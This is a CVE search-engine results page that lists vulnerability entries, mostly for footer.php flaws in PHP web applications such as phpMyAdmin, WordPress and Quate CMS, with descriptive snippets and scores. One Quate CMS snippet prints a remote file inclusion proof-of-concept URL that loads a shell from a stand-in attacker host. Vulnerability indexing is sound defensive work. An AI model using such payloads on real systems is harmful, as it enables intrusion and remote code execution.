CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

phpMyAdmin before 4.9.2 does not escape certain Git information, related to libraries/classes/Display/GitRevision.php and libraries/classes/Footer.php...

7.5CVSS9.3AI score0.00997EPSS

Exploits0References5Affected Software2

CVE•added 2019/12/06 2:45 a.m.•131 views

CVE-2019-19617

CVE-2019-19617 affects phpMyAdmin prior to 4.9.2. The issue is that phpMyAdmin does not escape certain Git information in GitRevision.php and Footer.php, per multiple advisories. Connected documents confirm affected product/version ranges and link to fix/release notes. The Debian entry notes the ...

9.8CVSS9.2AI score0.00997EPSS

Exploits0References5Affected Software1

seebug.org•added 2014/10/22 12:0 a.m.•26 views

ShopBuilder 5.6.1 /footer.php 本地文件包含漏洞

No description provided by source...

7.1AI score

Exploits0

seebug.org•added 2014/07/01 12:0 a.m.•11 views

FlatNuke 2.5.5 footer.php Multiple Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/14483/info FlatNuke is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities t...

7.1AI score

Exploits0

seebug.org•added 2014/07/01 12:0 a.m.•14 views

phpbms 0.96 Multiple Vulnerabilities

No description provided by source. phpBMS v0.96 phpbms.org eLwauxc2009, uasc.org.ua http://phpbms.org/trial/ SQL Inj -------------------------------------------------------------------------------------------------------------------------------------------------------------------------...

7.1AI score

Exploits0

seebug.org•added 2014/07/01 12:0 a.m.•32 views

phpGreetz <= 0.99 (footer.php) Remote File Include Vulnerability

No description provided by source. Author: [email protected] mozi phpGreetz Remote File Inclusion Vulnerability Greetz: Raver phpfreaks eu.undernet.org Greetz: SpiderZ , fUSiON ---------------------------------------------------------------- Download:...

7.1AI score

Exploits0

seebug.org•added 2014/07/01 12:0 a.m.•9 views

Phorum 3.3.2 Cross Site Scripting Vulnerabilities

No description provided by source. source: http://www.securityfocus.com/bid/4767/info Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems. The 'header.php' and 'footer.php' components of Phorum do not santize the client-supplied...

7.1AI score

Exploits0

seebug.org•added 2014/07/01 12:0 a.m.•11 views

Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion Vulnerabilities

No description provided by source. bif3-0.4.1 = Remote File Include Vulnerablitiy D.Script: http://bif.lunix.com.ar/tgz/bif3-0.4.1.tgz Discovered by: Alkomandoz Hacker Homepage: asb-may.net & mohandko.com & sniper-sa.com ====================================...

7.1AI score

Exploits0

Prion•added 2011/09/23 11:55 p.m.•12 views

Information disclosure

dotproject 2.1.4 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by style/dp-grey-theme/footer.php and certain other files...

5CVSS6.6AI score0.00283EPSS

Exploits1References3Affected Software1

Prion•added 2010/03/16 7:0 p.m.•12 views

Directory traversal

Multiple directory traversal vulnerabilities in Geekhelps ADMP 1.01, when magicquotesgpc is disabled, allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the style parameter to 1 colorvoid/footer.php, 2 default-green/footer.php, 3...

5.1CVSS7.9AI score0.06307EPSS

Exploits1References8Affected Software1

Exploit DB•added 2009/12/01 12:0 a.m.•41 views

Quate CMS 0.3.5 - Local/Remote File Inclusion

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Quate CMS PoC : http://target/path/admin/includes/header.php?securepagepath=http://attacker/shell.txt??? Vuln LFI : ./QuateCMS035/admin/includes/footer.php line 4 PoC :...

7.4AI score

Exploits0

UbuntuCve•added 2009/08/18 9:0 p.m.•26 views

CVE-2009-2853

Wordpress before 2.8.3 allows remote attackers to gain privileges via a direct request to 1 admin-footer.php, 2 edit-category-form.php, 3 edit-form-advanced.php, 4 edit-form-comment.php, 5 edit-link-category-form.php, 6 edit-link-form.php, 7 edit-page-form.php, and 8 edit-tag-form.php in wp-admin...

10CVSS5.9AI score0.01198EPSS

Exploits3References1

Exploit DB•added 2009/07/10 12:0 a.m.•37 views

phpbms 0.96 - Multiple Vulnerabilities

phpBMS v0.96 phpbms.org eLwauxc2009, uasc.org.ua http://phpbms.org/trial/ SQL Inj ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- $querystatement="SELECT...

7.4AI score

Exploits0

Prion•added 2008/09/24 5:41 a.m.•11 views

Remote file inclusion

PHP remote file inclusion vulnerability in footer.php in PHP-Crawler 0.8 allows remote attackers to execute arbitrary PHP code via a URL in the footerfile parameter...

7.5CVSS8AI score0.04755EPSS

Exploits1References5Affected Software1

Cvelist•added 2008/09/19 6:0 p.m.•15 views

CVE-2008-4137

PHP remote file inclusion vulnerability in footer.php in PHP-Crawler 0.8 allows remote attackers to execute arbitrary PHP code via a URL in the footerfile parameter...

7.5AI score0.04755EPSS

Exploits1References5

Prion•added 2008/07/25 1:41 p.m.•7 views

Design/Logic Flaw

BilboBlog 0.2.1 allows remote attackers to obtain sensitive information via 1 an enablecache=false query string to footer.php or 2 a direct request to pagination.php, which reveals the installation path in an error message...

5CVSS6.7AI score0.04516EPSS

Exploits0References2Affected Software1

Cvelist•added 2008/05/14 5:0 p.m.•10 views

CVE-2008-2206

Multiple cross-site scripting XSS vulnerabilities in Maian Music 1.1 allow remote attackers to inject arbitrary web script or HTML via the 1 keywords parameter in a search action to index.php, and the 2 msgscript parameter to admin/inc/footer.php...

5.8AI score0.00329EPSS

Exploits0References5

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by